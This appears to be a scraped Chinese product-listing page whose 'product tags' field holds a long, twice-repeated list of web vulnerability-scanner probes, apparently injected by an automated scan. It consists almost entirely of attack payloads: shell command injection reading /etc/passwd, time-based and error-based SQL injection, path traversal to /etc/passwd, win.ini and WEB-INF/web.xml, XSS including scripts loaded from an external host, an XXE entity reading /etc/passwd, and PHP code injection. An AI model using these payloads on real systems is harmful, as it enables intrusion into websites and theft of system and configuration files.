>
参数 [单位] 台
商品标签 [2] !(()[2] " procedure analyse(1[2] "&cat /etc/passwd&" 6123461234[2] "&ping -c 9 127.0.0.1&" 6123461234[2] "&ping -n 9 127.0.0.1&" 6123461234[2] "-extractvalue(rand()[2] ";ping -c 9 127.0.0.1;"[2] ";ping -n 9 127.0.0.1;"[2] "|ping -c 9 127.0.0.1|"[2] $(cat /etc/passwd)[2] ${${@print(md5(77777))}};[2] ${${sleep(5)}};[2] ${/**/phpinfo()}[2] ${1984121+391412}[2] ${@phpinfo()}[2] ${@print(md5(77777))};[2] %22%3Bping%20%2Dc%209%20127.0.0.1%3B%22[2] %22%3Bping%20%2Dn%209%20127.0.0.1%3B%22[2] %27%3Bping%20%2Dc%209%20127.0.0.1%3B%27[2] %27%3Bping%20%2Dn%209%20127.0.0.1%3B%27[2] %3Bping%20%2Dc%209%20127.0.0.1%3B[2] %3Bping%20%2Dn%209%20127.0.0.1%3B[2] &cat /etc/passwd& 6123461234[2] &ping -c 9 127.0.0.1& 6123461234[2] &ping -n 9 127.0.0.1& 6123461234[2] ' procedure analyse(1[2] '"[2] '"`1"'3001%22%27400\ 6123461234[2] '&cat /etc/passwd&' 6123461234[2] '&ping -c 9 127.0.0.1&' 6123461234[2] '&ping -n 9 127.0.0.1&' 6123461234[2] '-extractvalue(rand()[2] '.print(md5(77777)).'[2] '.sleep(5).'[2] '1"1\\200[2] '1"`1\\200[2] ';ping -c 9 127.0.0.1;'[2] ';ping -n 9 127.0.0.1;'[2] '|ping -c 9 127.0.0.1|'[2] )[2] )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))[2] */echo 123222*3344;//[2] ..[2] ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg[2] ................windowswin.ini[2] ../../../../../../../../../../etc/passwd�.jpg[2] ../../WEB-INF/web.xml[2] .././user.php\x00./[2] ../WEB-INF/web.xml[2] ..\..\..\..\..\..\..\..\windows\win.ini[2] ./user.php[2] ./user.php\x00[2] .\./.\./.\./.\./.\./.\./etc/passwd[2] /....//....//....//....//....//....//....//....//....//....//....//etc/passwd�.jpg[2] /....//....//....//....//....//....//....//....//....//....//....//etc/passwd[2] /....//....//....//....//....//....//....//....//....//....//....//windows/win.ini�.htm[2] /....//....//....//....//....//....//....//....//....//....//....//windows/win.ini�.jpg[2] /....//....//....//....//....//....//....//....//....//....//....//windows/win.ini[2] /../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd[2] /../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini[2] /../../../../../../../../../../boot.ini�.htm[2] /../../../../../../../../../../boot.ini�.txt[2] /../../../../../../../../../../etc/passwd�.jpg[2] /../../../../../../../../../../etc/passwd[2] /../../../../../../../../../../windows/win.ini�.jpg[2] /../../../../../../../../../../windows/win.ini[2] /../../../WEB-INF/web.xml[2] /../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd[2] /../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini[2] /../..//../..//../..//../..//../..//etc/passwd�.jpg[2] /../WEB-INF/web.xml[2] /.\./.\./.\./.\./.\./.\./windows/win.ini[2] /etc/passwd[2] /WEB-INF/web.xml[2] /\../\../\../\../\../\../\../etc/passwd[2] 0))/*'XOR(if(now()=sysdate()[2] 0))OR"*/[2] 0))OR'"XOR(if(now()=sysdate()[2] 0)--[2] 1 procedure analyse(1[2] 1-extractvalue(rand()[2] 1/**/XOR(if(now()=sysdate()[2] 11&nPz7dMvxG=vdtv7dOPf[2] 1my_inexistent_vuscanfile_with_long_filename�.jpg[2] 6123461234[2] 6123461234 Or 1=1[1] 6123461234 OR 2*3=6[1] 6123461234 ||1[1] 6123461234 ||7778[1] 6123461234" Or 1=1 Or "1"="1[1] 6123461234" OR 2*3=6 Or "1"="1[1] 6123461234";cat /etc/passwd;"[2] 6123461234"|"ld[2] 6123461234%22%3Bcat%20%2Fetc%2Fpasswd%3B%22[2] 6123461234%27%3Bcat%20%2Fetc%2Fpasswd%3B%27[2] 6123461234%3Bcat%20%2Fetc%2Fpasswd%3B[2] 6123461234' Or 1=1 Or '1'='1[1] 6123461234' OR 2*3=6 Or '1'='1[1] 6123461234';cat /etc/passwd;'[2] 6123461234'|'ld[2] 6123461234'||1|'[1] 6123461234/../../../../../../../../../../../../../boot.ini[2] 6123461234/../../../../../../../../../../boot.ini�.txt[2] 6123461234/../../../../../../../../../../etc/passwd�.jpg[2] 6123461234/../../../../../../../../../../etc/passwd[2] 6123461234;cat /etc/passwd;[2] 6123461234><�Sc�riPt�>prompt(7)<�/Sc�riPt�>[2] 6123461234><%00Sc%00riPt%00>prompt(7)<%00/Sc%00riPt%00>[2] 6123461234><img src='' onerror=alert(777)>[2] 6123461234><layer SRC=http://ha.ckers.org/xss.js></layer>[2] 6123461234><script onreadystatechange=alert(777)>[2] 6123461234><ScriPt src=http://ha.ckers.org/xss.js></ScriPt>[2] 6123461234><ScriPt>alert(777)</ScriPt>[2] 6123461234>><�Sc�riPt�>prompt(7)<�/Sc�riPt�>[1] 6123461234>><%00Sc%00riPt%00>prompt(7)<%00/Sc%00riPt%00>[1] 6123461234>><img src='' onerror=alert(777)>[1] 6123461234>><layer SRC=http://ha.ckers.org/xss.js></layer>[1] 6123461234>><script onreadystatechange=alert(777)>[1] 6123461234>><ScriPt src=http://ha.ckers.org/xss.js></ScriPt>[1] 6123461234>><ScriPt>alert(777)</ScriPt>[1] 6123461234>xss3927test[1] 6123461234>\x3E\x3CScriPt\x3Ealert\x28777\x29\x3C/ScriPt\x3E[1] 6123461234xss3927test[2] 6123461234\x3E\x3CScriPt\x3Ealert\x28777\x29\x3C/ScriPt\x3E[2] 6123461234`-if(now()=sysdate()[2] 6123461234|cat /etc/passwd[2] ;ping -c 9 127.0.0.1;[2] ;ping -n 9 127.0.0.1;[2] ;print(md5(77777));[2] <!--[2] <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>[2] ><�Sc�riPt�>prompt(7)<�/Sc�riPt�>[2] ><%00Sc%00riPt%00>prompt(7)<%00/Sc%00riPt%00>[2] ><img src='' onerror=alert(777)>[2] ><layer SRC=http://ha.ckers.org/xss.js></layer>[2] ><script onreadystatechange=alert(777)>[2] ><ScriPt src=http://ha.ckers.org/xss.js></ScriPt>[2] ><ScriPt>alert(777)</ScriPt>[2] cat /etc/passwd 6123461234[2] cat /etc/passwd[2] concat(0x74687e7e7e[2] concat(0x7e7e7e[2] data://text/plain;base64[2] eHNzN3Rlc3R4MSciPjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydCg3KT4x[2] extractvalue(rand()[2] file:///etc/passwd[2] http://mirrors.163.com/centos/5/readme[2] http://some-inexistent-vuscanwebsite/some_inexistent_vuscanfile_with_long_name?�.jpg[2] invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.[2] jsonp9527999[2] Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n[2] MSUyNTIyMiUyNTI3MyUyMjQlMjc1IjYn[2] prefer_filetype=[2] sleep(5)[2] unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.[2] version()))[2] version())))-- 1[2] version()))-"[2] version()))-'[2] WEB-INF/web.xml[2] WWRMZ2NVMFJHVTBHWmtRVVJ6YXNkYWRhYTJk[2] xss3927test[2] \..\..\..\WEB-INF\web.xml[2] \..\..\WEB-INF\web.xml[2] \x27\x22\x5C\x22\x5C\x27[4] \x3E\x3CScriPt\x3Ealert\x28777\x29\x3C/ScriPt\x3E[2] ^(#$!@#$)(()))******[2] `1'1"1\\200[2] `cat /etc/passwd`[2] `ping -c 9 127.0.0.1`[2] {"evil":response.end("vuscan" (1984*19841))}[2] {${phpinfo()}}[2] |ping -c 9 127.0.0.1|[2] ||cat /etc/passwd[2]
[2] !(()[2] " procedure analyse(1[2] "&cat /etc/passwd&" 6123461234[2] "&ping -c 9 127.0.0.1&" 6123461234[2] "&ping -n 9 127.0.0.1&" 6123461234[2] "-extractvalue(rand()[2] ";ping -c 9 127.0.0.1;"[2] ";ping -n 9 127.0.0.1;"[2] "|ping -c 9 127.0.0.1|"[2] $(cat /etc/passwd)[2] ${${@print(md5(77777))}};[2] ${${sleep(5)}};[2] ${/**/phpinfo()}[2] ${1984121+391412}[2] ${@phpinfo()}[2] ${@print(md5(77777))};[2] %22%3Bping%20%2Dc%209%20127.0.0.1%3B%22[2] %22%3Bping%20%2Dn%209%20127.0.0.1%3B%22[2] %27%3Bping%20%2Dc%209%20127.0.0.1%3B%27[2] %27%3Bping%20%2Dn%209%20127.0.0.1%3B%27[2] %3Bping%20%2Dc%209%20127.0.0.1%3B[2] %3Bping%20%2Dn%209%20127.0.0.1%3B[2] &cat /etc/passwd& 6123461234[2] &ping -c 9 127.0.0.1& 6123461234[2] &ping -n 9 127.0.0.1& 6123461234[2] ' procedure analyse(1[2] '"[2] '"`1"'3001%22%27400\ 6123461234[2] '&cat /etc/passwd&' 6123461234[2] '&ping -c 9 127.0.0.1&' 6123461234[2] '&ping -n 9 127.0.0.1&' 6123461234[2] '-extractvalue(rand()[2] '.print(md5(77777)).'[2] '.sleep(5).'[2] '1"1\\200[2] '1"`1\\200[2] ';ping -c 9 127.0.0.1;'[2] ';ping -n 9 127.0.0.1;'[2] '|ping -c 9 127.0.0.1|'[2] )[2] )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))[2] */echo 123222*3344;//[2] ..[2] ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg[2] ................windowswin.ini[2] ../../../../../../../../../../etc/passwd�.jpg[2] ../../WEB-INF/web.xml[2] .././user.php\x00./[2] ../WEB-INF/web.xml[2] ..\..\..\..\..\..\..\..\windows\win.ini[2] ./user.php[2] ./user.php\x00[2] .\./.\./.\./.\./.\./.\./etc/passwd[2] /....//....//....//....//....//....//....//....//....//....//....//etc/passwd�.jpg[2] /....//....//....//....//....//....//....//....//....//....//....//etc/passwd[2] /....//....//....//....//....//....//....//....//....//....//....//windows/win.ini�.htm[2] /....//....//....//....//....//....//....//....//....//....//....//windows/win.ini�.jpg[2] /....//....//....//....//....//....//....//....//....//....//....//windows/win.ini[2] /../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd[2] /../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini[2] /../../../../../../../../../../boot.ini�.htm[2] /../../../../../../../../../../boot.ini�.txt[2] /../../../../../../../../../../etc/passwd�.jpg[2] /../../../../../../../../../../etc/passwd[2] /../../../../../../../../../../windows/win.ini�.jpg[2] /../../../../../../../../../../windows/win.ini[2] /../../../WEB-INF/web.xml[2] /../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd[2] /../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini[2] /../..//../..//../..//../..//../..//etc/passwd�.jpg[2] /../WEB-INF/web.xml[2] /.\./.\./.\./.\./.\./.\./windows/win.ini[2] /etc/passwd[2] /WEB-INF/web.xml[2] /\../\../\../\../\../\../\../etc/passwd[2] 0))/*'XOR(if(now()=sysdate()[2] 0))OR"*/[2] 0))OR'"XOR(if(now()=sysdate()[2] 0)--[2] 1 procedure analyse(1[2] 1-extractvalue(rand()[2] 1/**/XOR(if(now()=sysdate()[2] 11&nPz7dMvxG=vdtv7dOPf[2] 1my_inexistent_vuscanfile_with_long_filename�.jpg[2] 6123461234[2] 6123461234 Or 1=1[1] 6123461234 OR 2*3=6[1] 6123461234 ||1[1] 6123461234 ||7778[1] 6123461234" Or 1=1 Or "1"="1[1] 6123461234" OR 2*3=6 Or "1"="1[1] 6123461234";cat /etc/passwd;"[2] 6123461234"|"ld[2] 6123461234%22%3Bcat%20%2Fetc%2Fpasswd%3B%22[2] 6123461234%27%3Bcat%20%2Fetc%2Fpasswd%3B%27[2] 6123461234%3Bcat%20%2Fetc%2Fpasswd%3B[2] 6123461234' Or 1=1 Or '1'='1[1] 6123461234' OR 2*3=6 Or '1'='1[1] 6123461234';cat /etc/passwd;'[2] 6123461234'|'ld[2] 6123461234'||1|'[1] 6123461234/../../../../../../../../../../../../../boot.ini[2] 6123461234/../../../../../../../../../../boot.ini�.txt[2] 6123461234/../../../../../../../../../../etc/passwd�.jpg[2] 6123461234/../../../../../../../../../../etc/passwd[2] 6123461234;cat /etc/passwd;[2] 6123461234><�Sc�riPt�>prompt(7)<�/Sc�riPt�>[2] 6123461234><%00Sc%00riPt%00>prompt(7)<%00/Sc%00riPt%00>[2] 6123461234><img src='' onerror=alert(777)>[2] 6123461234><layer SRC=http://ha.ckers.org/xss.js></layer>[2] 6123461234><script onreadystatechange=alert(777)>[2] 6123461234><ScriPt src=http://ha.ckers.org/xss.js></ScriPt>[2] 6123461234><ScriPt>alert(777)</ScriPt>[2] 6123461234>><�Sc�riPt�>prompt(7)<�/Sc�riPt�>[1] 6123461234>><%00Sc%00riPt%00>prompt(7)<%00/Sc%00riPt%00>[1] 6123461234>><img src='' onerror=alert(777)>[1] 6123461234>><layer SRC=http://ha.ckers.org/xss.js></layer>[1] 6123461234>><script onreadystatechange=alert(777)>[1] 6123461234>><ScriPt src=http://ha.ckers.org/xss.js></ScriPt>[1] 6123461234>><ScriPt>alert(777)</ScriPt>[1] 6123461234>xss3927test[1] 6123461234>\x3E\x3CScriPt\x3Ealert\x28777\x29\x3C/ScriPt\x3E[1] 6123461234xss3927test[2] 6123461234\x3E\x3CScriPt\x3Ealert\x28777\x29\x3C/ScriPt\x3E[2] 6123461234`-if(now()=sysdate()[2] 6123461234|cat /etc/passwd[2] ;ping -c 9 127.0.0.1;[2] ;ping -n 9 127.0.0.1;[2] ;print(md5(77777));[2] <!--[2] <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>[2] ><�Sc�riPt�>prompt(7)<�/Sc�riPt�>[2] ><%00Sc%00riPt%00>prompt(7)<%00/Sc%00riPt%00>[2] ><img src='' onerror=alert(777)>[2] ><layer SRC=http://ha.ckers.org/xss.js></layer>[2] ><script onreadystatechange=alert(777)>[2] ><ScriPt src=http://ha.ckers.org/xss.js></ScriPt>[2] ><ScriPt>alert(777)</ScriPt>[2] cat /etc/passwd 6123461234[2] cat /etc/passwd[2] concat(0x74687e7e7e[2] concat(0x7e7e7e[2] data://text/plain;base64[2] eHNzN3Rlc3R4MSciPjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydCg3KT4x[2] extractvalue(rand()[2] file:///etc/passwd[2] http://mirrors.163.com/centos/5/readme[2] http://some-inexistent-vuscanwebsite/some_inexistent_vuscanfile_with_long_name?�.jpg[2] invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.[2] jsonp9527999[2] Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n[2] MSUyNTIyMiUyNTI3MyUyMjQlMjc1IjYn[2] prefer_filetype=[2] sleep(5)[2] unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.[2] version()))[2] version())))-- 1[2] version()))-"[2] version()))-'[2] WEB-INF/web.xml[2] WWRMZ2NVMFJHVTBHWmtRVVJ6YXNkYWRhYTJk[2] xss3927test[2] \..\..\..\WEB-INF\web.xml[2] \..\..\WEB-INF\web.xml[2] \x27\x22\x5C\x22\x5C\x27[4] \x3E\x3CScriPt\x3Ealert\x28777\x29\x3C/ScriPt\x3E[2] ^(#$!@#$)(()))******[2] `1'1"1\\200[2] `cat /etc/passwd`[2] `ping -c 9 127.0.0.1`[2] {"evil":response.end("vuscan" (1984*19841))}[2] {${phpinfo()}}[2] |ping -c 9 127.0.0.1|[2] ||cat /etc/passwd[2]
